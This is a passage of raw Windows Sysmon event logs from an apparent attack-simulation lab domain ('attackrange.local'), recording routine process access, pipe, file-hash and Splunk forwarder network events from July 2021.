Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001049449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:54:06.231{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7760.376.114217326C:\Program Files\Mozilla Firefox\firefox.exe 
17141700x80000000000000001049448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:54:06.231{466BC892-5CC7-60E8-0D11-00000000CF01}7760\chrome.7760.376.114217326C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000807876Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:07.906{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F3152105869FF5C4EC9A2FB250CCF69,SHA256=11C73D583E4A70E965223CD08265AC1DCB3296C15553CBBAD512B97E56EB5EF2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.971{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5b
e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.971{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:07.956{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.956{466BC892-32D3-60E8-770B-00000000CF01}63565268C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.956{466BC892-32D3-60E8-770B-00000000CF01}63565268C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.956{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\nt
dll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.956{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.956{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.836{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program 
Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075353MD5=FEEA56A70CD049F4F3B111C8BAFFD05B,SHA256=353F0A644826BEA87101B649BF1F812D2CC5035AC3BF46D110AC46B90CC018A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.733{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=111D1364BFB9073FA368E3ABDD03FFC5,SHA256=E978F5BAC746ACA3E359E43D3B8D764D5FF20D7D5ACC80741B2DD40D77530F8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807877Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:08.906{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06C3BE352FEADA2240A96FFB583B6679,SHA256=E31FFDFD8355B1C2CA967392DEB752AD62C87FE3DB0A07B3C74DB5FBFDEB16A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:08.988{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075353MD5=BEC53E6D4BE59D23EEBC911FA615E46C,SHA256=E223AAC236A5F16CA5D04404C205699C803B34647119E8DB1D59D561D10B6E89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:08.972{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Program Files\ansible\AttackRangeSysmon.xmlMD5=1430C209EFF7FD5583D3D311A56A889C,SHA256=75358E8028A9D2A1CC1782C71200ED0E529269E98BDC3389937C592CA9D2EB8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:08.739{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2459191E0AC69D26C1EEEDAF404E9F5,SHA256=CAA0190B32B6D281F04DB7C316D39BD38E2A4262439630C4F70E513FA66A39E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807878Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:09.922{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A924BF8E0F1A371DF32D644844D36AD8,SHA256=DEAF2CAD858B0F94461B0CB5204F358E61252EE3E4F200175AEA271D267828D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:09.758{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=265039CE2AF1F2B6558CB1C5C12A5B2F,SHA256=BFC3AF5B3FEFC3640E865E049E06B9A3393FF2C9294EEC4BE716E3FEA8316593,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807880Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:10.953{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B849EB361D89E13FDB51897C7DFA64F3,SHA256=F5D16C88AF441523213DF3F376E1C439C7F4128B86304F8852ECADAC8163E6AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807879Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:09.242{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57289-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001049584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.689{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.689{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 